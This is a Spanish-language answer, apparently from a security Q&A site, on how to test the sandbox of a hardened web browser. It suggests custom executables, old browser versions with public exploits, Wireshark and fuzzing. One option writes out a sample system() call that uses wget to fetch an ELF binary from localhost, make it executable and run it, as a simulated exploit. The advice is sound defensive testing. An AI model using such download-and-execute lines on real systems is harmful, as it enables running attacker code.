¿Cómo probar la seguridad de un navegador web reforzado?

Si quieres probar las capacidades de la zona de pruebas, necesitas algo como un exploit real que intente hacer algo que haría un atacante. Pero creo que no es realmente posible obtener una vulnerabilidad para un navegador actual. Así que tienes las siguientes opciones:

1. Pruebe el sandbox con un ejecutable personalizado creando un ejecutable que utilice las técnicas de sandbox e intentará ejecutar una carga útil. Los resultados podrían ser comparables si su navegador no utiliza técnicas de sandbox por sí mismo.
2. Pruebe su sandbox con una versión anterior de su navegador y una vulnerabilidad pública disponible.
3. Simule un intento de explotación introduciendo un código personalizado en su navegador como system("wget http://127.0.0.1/t.elf; chmod +x ./elf; ./elf"); . Si su navegador es de código abierto, por ejemplo, puede crear una versión personalizada de su navegador y agregar el código personalizado en una región de código en la que también lo haría una vulnerabilidad real. ser.

Esto depende del tipo de prueba que quieras hacer. Si el endurecimiento que has hecho está diseñado para evitar que el navegador filtre información de manera inadecuada, entonces puedes configurar algo como Wireshark en la máquina en la que estás ejecutando para verificar el tráfico enviado desde el navegador.

Si está buscando probar si el navegador se puede bloquear de una manera explotable, entonces eso es una cuestión diferente. Eso sería un proceso complejo, pero algo como American Fuzz Lop podría ser un punto de partida.